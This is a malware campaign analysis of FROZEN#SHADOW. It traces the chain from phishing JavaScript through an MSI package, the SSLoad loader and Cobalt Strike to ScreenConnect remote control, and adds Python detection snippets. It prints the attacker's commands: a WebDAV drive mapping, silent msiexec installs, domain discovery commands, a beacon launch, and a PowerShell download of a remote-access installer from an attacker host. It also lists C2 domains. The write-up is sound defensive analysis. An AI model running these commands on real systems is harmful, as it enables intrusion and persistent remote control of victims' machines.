A new attack campaign, tracked as FROZEN#SHADOW, has been discovered that uses SSLoad malware together with Cobalt Strike implants to pivot through and take over entire networks.
In addition, the threat actors used Remote Monitoring and Management (RMM) software such as ScreenConnect for further control.
SSLoad is a well-designed malware that can stealthily infiltrate the systems, gather sensitive information, and exfiltrate the collected information back to the malware operators.
Moreover, the malware also leverages multiple backdoors and payloads to evade detection and maintain persistence.
Technical Analysis
This new attack campaign starts with a traditional phishing email containing a malicious link.
When users visit this link, they are redirected via mmtixmm[.]org to another download site, from which a JavaScript file is downloaded to the victim machine.
If this JavaScript file is manually executed, it performs several operations that will download and execute further payloads on the victim machine.
The targeting of these phishing email campaigns appears to be random, as the victims were spread across multiple regions, including Asia, Europe, and the Americas.
Further investigations on the malware revealed that the attack takes place in different stages as follows:
- Stage 1: Initial Execution – JavaScript
- Stage 2: MSI File Execution
- Stage 3: Malware Execution
- Stage 4: Cobalt Strike Execution
- Stage 5: RMM Software & Lateral Movement
Stage 1: Initial Execution – JavaScript
This initial stage involves the manual execution of the JavaScript file.
On analyzing the JS file out_czlrh.js, it was discovered that it consisted of 97.6% commented code with random characters to obfuscate the file.
However, removing the commented code revealed a crystal clear JS code that did not have any kind of obfuscation.
On analyzing the JS code, it was observed that the script performs multiple operations, starting with creating ActiveXObject instances for WScript.Network and Scripting.FileSystemObject.
After this, the JS code calls GetObject("winmgmts:\\.\root\cimv2") to obtain a WMI object for simple command-line operations.
In addition, the code also sets up variables to manage the number of connection attempts and gather the connection status of a network share.
Further, the script also maps all the available drives to a network share located at \\wireoneinternet[.]info@80\share.
The JS code also executes the “net use” command via WMI to map the network drive correctly.
After this, there is a three-second wait, after which it again runs the same command to confirm the mapping of the network drive.
Once all these steps are successfully completed, the script constructs a command to install an MSI package (slack.msi) from the mapped network drive using msiexec.exe.
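The Stage 1 chain above (a drive mapped to a WebDAV share via "net use", then msiexec installing a package from that drive) can be matched in process-creation telemetry. The following is an added detection example, not code from the original report; the command lines, drive letter and hostname are constructed placeholders.

```python
import re

# Constructed process command lines modelled on the Stage 1 chain described
# above; the hostname and drive letter are placeholders, not values from the report.
SAMPLE_CMDLINES = [
    r"net use Z: \\webdav-placeholder.invalid@80\share",
    r"msiexec.exe /i Z:\slack.msi /quiet",
    r"net use Y: \\fileserver\public",
    r"msiexec.exe /i C:\Users\alice\Downloads\installer.msi",
]

# "\\host@80\share" or "\\host@SSL\share" is the WebDAV mini-redirector UNC
# syntax: the share is served over HTTP(S) rather than SMB.
WEBDAV_UNC = re.compile(r"\\\\(?P<host>[^\\\s@]+)@(?P<port>80|443|ssl)\\", re.I)
NET_USE = re.compile(r"\bnet(?:\.exe)?\s+use\s+(?P<drive>[a-z]:)\s+(?P<unc>\\\\\S+)", re.I)
MSIEXEC = re.compile(r"\bmsiexec(?:\.exe)?\s+/i\s+(?P<pkg>\S+)", re.I)

def webdav_mappings(cmdlines):
    """Return {drive letter: host} for every 'net use' that maps a WebDAV UNC."""
    mapped = {}
    for cmd in cmdlines:
        m = NET_USE.search(cmd)
        if m:
            w = WEBDAV_UNC.search(m.group("unc"))
            if w:
                mapped[m.group("drive").upper()] = w.group("host")
    return mapped

def msi_from_webdav(cmdlines):
    """Flag msiexec installs whose package lives on a WebDAV-mapped drive or is
    itself a WebDAV UNC. Returns a list of (package path, WebDAV host)."""
    mapped = webdav_mappings(cmdlines)
    alerts = []
    for cmd in cmdlines:
        m = MSIEXEC.search(cmd)
        if not m:
            continue
        pkg = m.group("pkg")
        w = WEBDAV_UNC.search(pkg)
        if w:
            alerts.append((pkg, w.group("host")))
        elif pkg[:2].upper() in mapped:
            alerts.append((pkg, mapped[pkg[:2].upper()]))
    return alerts
```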
Stage 2: MSI Execution
This slack.msi file is similar to the BazarBackdoor, often used by the TrickBot malware gang.
That backdoor was capable of infiltrating networks and deploying additional payloads. After the slack.msi file executes, the malware communicates with multiple domains:
- wireoneinternet[.]info
- skinnyjeanso[.]com
- titnovacrion[.]top
- Maramaravilha[.]com
- globalsolutionunlimitedltd[.]com
Moreover, only after this is the SSLoad malware downloaded and executed.
The SSLoad payload consists of a semi-randomly named DLL file located at %APPDATA%\local\digistamp\mbae-api-na.dll.
This DLL is executed by Rundll32.exe, after which the DLL copies itself to %APPDATA%\Custom_update.
Stage 3: Malware Execution
In addition to the previous stage, the rundll32.exe command also begins communication with two preconfigured C2 servers, hxxps://skinnyjeanso[.]com/live/ and hxxps://titnovacrion[.]top/live/. The malware then collects system and user data for the local host, as well as domain-related information, using the following cmd.exe commands:
- cmd.exe /c ipconfig /all
- cmd.exe /c systeminfo
- cmd.exe /c nltest /domain_trusts
- cmd.exe /c nltest /domain_trusts /all_trusts
- cmd.exe /c net view /all /domain
- cmd.exe /c net view /all
- cmd.exe /c net group "domain admins" /domain
- cmd.exe /c wmic.exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list
- cmd.exe /c net config workstation
- cmd.exe /c wmic.exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get displayname | findstr /v /b /c:displayname || echo no antivirus installed
- cmd.exe /c whoami /groups
This collected information is then sent to the C2 servers over HTTPS. Once the threat actors receive it from the infected system, they begin executing manual commands, after confirming that the information comes from a legitimate server and not from a honeypot. The manual commands executed by the threat actors are as follows:
- powershell.exe -c "[console]::outputencoding = [console]::inputencoding = [system.text.encoding]::getencoding('utf-8'); cd c:\; powershell"
- whoami.exe /groups
- net.exe group "domain admins" /dom
- wmic.exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list
These commands were executed to probe the server environment ahead of the next stage of malware activity.
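The automated discovery commands in Stage 3 and the operator's manual follow-ups share a recognisable shape: one parent process spawning several distinct discovery families (trust enumeration, domain admin lookup, antivirus enumeration, group membership) within seconds. The following is an added detection example, not code from the original report; the process-creation events are constructed, and the parent image and timestamps are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events (timestamp, parent image, command line),
# modelled on the discovery commands described above; not data from the report.
EVENTS = [
    ("2024-04-22T10:00:02", "rundll32.exe", "cmd.exe /c systeminfo"),
    ("2024-04-22T10:00:03", "rundll32.exe", "cmd.exe /c nltest /domain_trusts /all_trusts"),
    ("2024-04-22T10:00:04", "rundll32.exe", "cmd.exe /c net view /all /domain"),
    ("2024-04-22T10:00:05", "rundll32.exe", 'cmd.exe /c net group "domain admins" /domain'),
    ("2024-04-22T10:00:06", "rundll32.exe", r"cmd.exe /c wmic.exe /node:localhost"
     r" /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list"),
    ("2024-04-22T10:00:07", "rundll32.exe", "cmd.exe /c whoami /groups"),
    ("2024-04-22T15:30:00", "explorer.exe", "cmd.exe /c systeminfo"),  # benign one-off
]

# One pattern per discovery family the campaign is reported to use.
DISCOVERY_PATTERNS = {
    "system_info": re.compile(r"\bsysteminfo\b", re.I),
    "domain_trusts": re.compile(r"\bnltest\s+/domain_trusts\b", re.I),
    "share_enum": re.compile(r"\bnet\s+view\s+/all\b", re.I),
    "domain_admins": re.compile(r"\bnet\s+group\s+\"domain admins\"", re.I),
    "av_enum": re.compile(r"securitycenter2.*antivirusproduct", re.I),
    "group_membership": re.compile(r"\bwhoami\s+/groups\b", re.I),
}

def classify(cmdline):
    """Return the set of discovery families a single command line matches."""
    return {name for name, pat in DISCOVERY_PATTERNS.items() if pat.search(cmdline)}

def find_discovery_bursts(events, window=timedelta(minutes=5), min_families=4):
    """Flag parents that spawn >= min_families discovery families within window."""
    by_parent = {}
    for ts, parent, cmd in events:
        fams = classify(cmd)
        if fams:
            by_parent.setdefault(parent, []).append((datetime.fromisoformat(ts), fams))
    alerts = []  # list of (parent image, sorted family names)
    for parent, hits in by_parent.items():
        hits.sort(key=lambda h: h[0])
        for i, (start, _) in enumerate(hits):
            seen = set()
            for ts, fams in hits[i:]:
                if ts - start > window:
                    break
                seen |= fams
            if len(seen) >= min_families:
                alerts.append((parent, sorted(seen)))
                break  # one alert per parent is enough
    return alerts
```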
Stage 4: Cobalt Strike Beacon
This stage of the malware involves deploying the Cobalt Strike beacon on the systems after executing the manual commands.
Once this beacon is deployed, it becomes the primary channel for C2 communication. The beacon is dropped and executed via the following rundll32.exe command.
Rundll32.exe C:\ProgramData\msedge.dll,MONSSMRpgaTQssmrpgatq
Additionally, the threat actors also used this Cobalt Strike to download and install a ScreenConnect RMM software instance on the victim system using the following commands:
- cmd.exe /c whoami /groups
- cmd.exe /c wmic /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list
- cmd.exe /c iwr -uri "hxxps://t0talwar.screenconnect[.]com/bin/screenconnect.clientsetup.msi?e=access&y=guest&c=&c=tjx-usa.com&c=&c=dc&c=&c=&c=&c=" -outfile c:\programdata\msedgeview.msi
- cmd.exe /c systeminfo
- cmd.exe /c msiexec.exe /i C:\ProgramData\Msedgeview.msi /quiet /qn
Stage 5: RMM Software And Lateral Movement
Every compromised system is controlled through the ScreenConnect RMM software so that the threat actors maintain complete control over it.
After this, lateral movement takes place by harvesting credentials and other critical system details.
The environment is enumerated using multiple PowerShell commands, such as the Invoke-ShareFinder, Find-DomainShare, and Get-DomainFileServer cmdlets.
Through credential extraction, the threat actors are also able to obtain the NTLM hash of a domain admin account.
Indicators Of Compromise
C2 Address
Furthermore, a complete list of files/hashes used for this attack campaign can be found here.